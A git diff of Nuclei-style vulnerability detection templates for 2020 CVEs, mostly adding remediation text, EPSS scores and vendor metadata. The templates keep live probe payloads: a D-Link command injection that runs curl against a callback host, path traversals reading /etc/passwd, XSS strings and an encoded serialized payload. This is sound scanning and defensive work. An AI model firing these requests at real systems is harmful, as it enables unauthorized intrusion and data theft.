"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - type: word + part: header words: - 'Content-Type: text/html' - part: header -# Enhanced by mp on 2022/03/24 +# digest: 4a0a00473045022100ba5153d0573e454ff4920ae629d3c37499af0847301d0076de7c2a7476ac8a72022062f3254130814debe82ef9c80e315b77fe45cda8e3e09b7a6035448fcfbd19ab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 4698b44a71..0b81a03e92 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion. reference: - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt - https://github.com/php-fusion/PHP-Fusion/issues/2312 @@ -15,11 +17,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24949 cwe-id: CWE-77 - cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:* - epss-score: 0.96895 - tags: rce,php,packetstorm,cve,cve2020,phpfusion + epss-score: 0.96368 + epss-percentile: 0.99399 + cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: php-fusion + product: php-fusion + tags: rce,php,packetstorm,cve,cve2020,phpfusion http: - method: GET @@ -28,14 +33,13 @@ http: matchers-condition: and matchers: - - - type: status - status: - - 200 - - type: word part: body words: - "infusion_db.php" -# Enhanced by mp on 2022/07/13 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c700933afb8284b18a4a5a012d27fdd5fcf5bd026dff80c0ac1385149de550d4022100e55dfd770848e10fdeba6b95c0b63984c33651392c71e94d003cf7675fc570a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 16195b1423..6529fbfb33 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. + remediation: | + Update the camera firmware to the latest version to fix the vulnerability. reference: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - https://twitter.com/Dogonsecurity/status/1273251236167516161 @@ -13,10 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 - epss-score: 0.96698 - tags: cve,cve2020,dlink + epss-score: 0.96829 + epss-percentile: 0.99573 + cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dcs-2530l_firmware + tags: cve,cve2020,dlink http: - method: GET @@ -32,12 +38,12 @@ http: condition: and - type: word + part: header words: - "text/plain" - part: header - type: status status: - 200 -# Enhanced by mp on 2022/07/15 +# digest: 490a00463044022046f6313d6b5c745450e6f970dfcb162fc7cb3521e8c41c215fbfca69196ec60202206ca2cff410c5be8f8e40b80aaf54b666dcf96ebe807b23835e1a36c54f3755c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 78de49f682..c233d23d93 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -2,26 +2,32 @@ id: CVE-2020-25213 # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt - info: name: WordPress File Manager Plugin - Remote Code Execution author: foulenzer severity: critical description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. + remediation: | + Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day - https://nvd.nist.gov/vuln/detail/CVE-2020-25213 - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:*:*:* - epss-score: 0.97389 + epss-score: 0.97352 + epss-percentile: 0.99861 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: webdesi9 + product: file_manager + framework: wordpress tags: wordpress,rce,kev,fileupload,intrusive,packetstorm,cve,cve2020 http: @@ -64,12 +70,12 @@ http: condition: and - type: word + part: header words: - application/json - part: header - type: status status: - 200 -# Enhanced by mp on 2022/03/27 +# digest: 4b0a0048304602210087dda375824bbc4ccdcb3a71c8e83fcfaeb060e5a7a5efd16075e488f16b45c6022100c3de9c1b4d2df29cdfeb62283e7cdf9535bf4ee9db631cf0ab67d8b389ee23e6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 7d9445bc55..7d89a49f05 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -5,20 +5,27 @@ info: author: gy741 severity: critical description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. + remediation: | + Apply the latest security patches provided by Sophos to mitigate the vulnerability. reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223 - https://nvd.nist.gov/vuln/detail/CVE-2020-25223 - https://community.sophos.com/b/security-blog + - https://cwe.mitre.org/data/definitions/78.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25223 + cwe-id: CWE-78 + epss-score: 0.97433 + epss-percentile: 0.99925 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* - epss-score: 0.97478 - tags: cve,cve2020,sophos,rce,oast,unauth,kev metadata: max-request: 1 + vendor: sophos + product: unified_threat_management + tags: cve,cve2020,sophos,rce,oast,unauth,kev http: - raw: @@ -46,4 +53,4 @@ http: words: - "http" -# Enhanced by mp on 2022/03/27 +# digest: 490a004630440220672150895f55090c00049593cfa492da1912804ae8909fb129bd825220e2cf2902201f2f8dd72e52cccf5e8798db8fb002554d0a2ee8e821b13ee4de497fbd3349d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 14d90f857f..5bc0470d51 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting. + remediation: | + Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/49300 - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability @@ -15,31 +17,34 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - cpe: cpe:2.3:a:xinuos:openserver:*:*:*:*:*:*:*:* - epss-score: 0.00153 - tags: cve,cve2020,sco,xss,edb,packetstorm + epss-score: 0.00176 + epss-percentile: 0.54572 + cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xinuos + product: openserver + tags: cve,cve2020,sco,xss,edb,packetstorm,intrusive http: - method: GET path: - - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E' + - "{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word + part: body + words: + -

    hello

    + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - type: word - words: - - "

    hello

    " - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/14 +# digest: 4a0a00473045022100fe635e756c9b6c81454f1c677d6321efc6a6615127be75708358ecd8b146e8ae02206f242d63b8c050b4082f180fdadbac42195d06ad7a1339184ef31d9b152e85ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index f37aadde01..c1cd55548f 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -5,20 +5,27 @@ info: author: gy741 severity: critical description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 + - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183 + - https://www.dlink.com/en/security-bulletin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25506 cwe-id: CWE-78 - epss-score: 0.97445 - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev + epss-score: 0.97424 + epss-percentile: 0.99916 + cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: dlink + product: dns-320_firmware + tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: useragent: '{{rand_base(6)}}' @@ -30,7 +37,6 @@ http: Accept: */* C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 Host: {{Hostname}} @@ -39,7 +45,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" @@ -48,4 +54,4 @@ http: words: - "User-Agent: {{useragent}}" -# Enhanced by mp on 2022/03/27 +# digest: 4b0a00483046022100f5979f18d0d00a109235681c67a75c2273159ad93dc9fa089ab1e867b3a0eb3a0221008ab2c831c9cd6a81924a4cd079c55d5a7beb50f558f4417a8f3a14d1951046dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index ae867a74b6..6feb887812 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://github.com/hktalent/CVE-2020-2551 - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 @@ -14,11 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97281 - tags: cve,cve2020,oracle,weblogic,rce,unauth + epss-score: 0.97463 + epss-percentile: 0.9995 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,weblogic,rce,unauth http: - method: GET @@ -28,21 +33,21 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "10.3.6.0" - "12.1.3.0" - "12.2.1.3" - "12.2.1.4" condition: or - part: body - type: word + part: body words: - "WebLogic" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/03/25 +# digest: 4b0a004830460221009049fc556ab3c57695885d4fabcfba9853a70c41b5881e242c47f3bbe492a76a022100f95c800af75f3a2399e4d54d6b7bc8a4be96a6f6dcbbdfaa4507beef7308bb74:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 0bd675d310..0f484e8997 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://www.exploit-db.com/exploits/48812 - https://github.com/zoujingli/ThinkAdmin/issues/244 @@ -16,11 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - cpe: cpe:2.3:a:ctolog:thinkadmin:*:*:*:*:*:*:*:* - epss-score: 0.96472 - tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 + epss-score: 0.96375 + epss-percentile: 0.99405 + cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ctolog + product: thinkadmin + tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 http: - method: GET @@ -29,11 +34,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/07/15 + - type: status + status: + - 200 + +# digest: 490a0046304402200909060faa4b4346b2307a7e368d16750131cd50fde38eed1dbdb9bf8e9db3cc02204bb395060cc2b7c7cdcbca14042f3f8976adf6987ecc3ac50355bc065b2a1ce0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index 5355e3140f..9f0369baf5 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder. + remediation: | + Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability. reference: - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html - http://kb.commvault.com/article/63264 @@ -14,32 +16,35 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 + epss-score: 0.01865 + epss-percentile: 0.87054 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* - epss-score: 0.03084 - tags: cve,cve2020,commvault,lfi metadata: max-request: 1 + vendor: commvault + product: commcell + tags: cve,cve2020,commvault,lfi http: - method: POST path: - "http://{{Host}}:81/SearchSvc/CVSearchService.svc" + body: | + + + + + c:/Windows/system.ini + + + + headers: Cookie: Login soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile content-type: text/xml - body: | - - - - - c:/Windows/system.ini - - - - matchers-condition: and matchers: - type: word @@ -50,4 +55,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/15 +# digest: 4a0a0047304502203d9478b9edb588c1bb77726d85b6b77937fefdecb624d773e1a1e129ebf34c6202210087b891c0379eff27e79d0709c1849e0125d146b85438ada7986fb1df11068053:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 2b81a483ac..64189a6dbb 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -6,21 +6,25 @@ info: severity: medium description: | HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode. + remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. reference: - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 - https://www.hashicorp.com/blog/category/consul - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 - remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. + - https://security.gentoo.org/glsa/202208-09 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-25864 cwe-id: CWE-79 - cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* epss-score: 0.00255 - tags: cve,cve2020,consul,xss + epss-percentile: 0.63129 + cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 + vendor: hashicorp + product: consul + tags: cve,cve2020,consul,xss,intrusive http: - raw: @@ -29,26 +33,26 @@ http: Host: {{Hostname}} - - | GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - - "text/html" + - text/html - type: word part: body_2 words: - - "" + - -# Enhanced by mp on 2022/08/14 + - type: status + status: + - 200 + +# digest: 490a004630440220559c57ef3f7311268bbb10bfb7eac3be234d81ccb1a4bdf75c2d68cec4eee0ca022076fb5b69941d2284ed05185d3fa94b639de84a6478cbf567834808c7d6179878:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index 225e0d8c28..1561560c3a 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -6,27 +6,31 @@ info: severity: high description: | Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information. + remediation: | + Apply the latest security patches provided by Cisco to fix the vulnerability. reference: - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 classification: cve-id: CVE-2020-26073 - tags: cve,cve2020,cisco,lfi metadata: max-request: 1 + tags: cve,cve2020,cisco,lfi http: - method: GET path: - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/07/15 +# digest: 4b0a0048304602210093b5325073f2c8cc6afd564686b47d297156183c850c1bd644f37e142ab542cf022100df13c84724cfdc148ed72097e25053bc533f89889ef1eecf91d114ba505f5673:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 9828b35606..d3ef943790 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: | + Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability. reference: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p @@ -15,11 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-26153 cwe-id: CWE-79 - cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:*:*:* epss-score: 0.00127 - tags: cve,cve2020,xss,wordpress,wp-plugin + epss-percentile: 0.47025 + cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: eventespresso + product: event_espresso + framework: wordpress + tags: cve,cve2020,xss,wordpress,wp-plugin http: - method: GET @@ -29,17 +35,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '"/>' - part: body - - - type: status - status: - - 500 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 500 + +# digest: 4a0a00473045022100fdbfbdd52229e2291acb623af409c58cd4cf98a4df7a2ad581c9eda10914fbdc02204406416083d946ed8d1179f88bd1135813be65b5849956f420d92054cdb269db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 875c12e125..501ceeee2e 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -5,21 +5,27 @@ info: author: CasperGN,daffainfo severity: critical description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests. + remediation: | + Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26214 + - https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26214 cwe-id: CWE-287 + epss-score: 0.01546 + epss-percentile: 0.85705 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* - epss-score: 0.01307 - tags: cve,cve2020,alerta,auth-bypass metadata: max-request: 1 + vendor: alerta_project + product: alerta + tags: cve,cve2020,alerta,auth-bypass http: - method: GET @@ -28,6 +34,9 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - compare_versions(version, '< 8.1.0') - type: word part: body @@ -37,10 +46,6 @@ http: - '"severity"' condition: and - - type: dsl - dsl: - - compare_versions(version, '< 8.1.0') - - type: status status: - 200 @@ -48,14 +53,14 @@ http: extractors: - type: regex name: version - internal: true group: 1 regex: - '"name": "Alerta ([0-9.]+)"' + internal: true - type: regex group: 1 regex: - '"name": "Alerta ([0-9.]+)"' -# Enhanced by mp on 2022/04/22 +# digest: 4a0a00473045022100da9498b6b663fe4586c6956fc148df962ce67277dd235260b67f1836e33b853c022030495a4ae28e6ff1fe96daa4a743389e91fe0f9f6047d6a0fae90fd9c29a1102:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 7b4b09fe92..f119bc1976 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -6,21 +6,26 @@ info: severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. + remediation: Fixed in 1.4.14. reference: - https://x-stream.github.io/CVE-2020-26217.html - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2 - https://nvd.nist.gov/vuln/detail/cve-2020-26217 - remediation: Fixed in 1.4.14. + - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97456 - tags: cve,cve2020,xstream,deserialization,rce,oast + epss-percentile: 0.99945 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,deserialization,rce,oast http: - raw: @@ -94,4 +99,5 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by md on 2023/04/12 + +# digest: 4b0a00483046022100b1f1b19bd50e4961a2b943acad602f278925bea30f75771fffa6a9f2727f37f4022100f1a81e9e547466f1344157b8fa4421350076c08cb4cca0596ff652b074a3a127:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index a01de4f5db..230af247ba 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -6,22 +6,27 @@ info: severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + remediation: Fixed in 4.2.1. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 - remediation: Fixed in 4.2.1. + - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 - cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:*:*:* - epss-score: 0.0128 + epss-score: 0.01502 + epss-percentile: 0.85479 + cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: prestashop + product: productcomments + framework: prestashop tags: cve,cve2020,sqli,prestshop,packetstorm http: @@ -40,4 +45,4 @@ http: - 'contains(body, "average_grade")' condition: and -# Enhanced by md on 2022/12/08 +# digest: 4a0a00473045022100946f14fdce48d843b55c150563e5223407c4af63c6b1b25930fd6f9de4cd8bd3022015125edffcc14607bd42dccdf8a72d12ad0f1c9a5075dd2bc23144eb6789f74c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index c2cee4e2c5..4fbaeb0882 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -6,21 +6,26 @@ info: severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. reference: - https://x-stream.github.io/CVE-2020-26258.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258 - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28 - https://nvd.nist.gov/vuln/detail/CVE-2020-26258 - remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. + - https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.93377 - tags: cve,cve2020,xstream,ssrf,oast + epss-percentile: 0.98805 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + 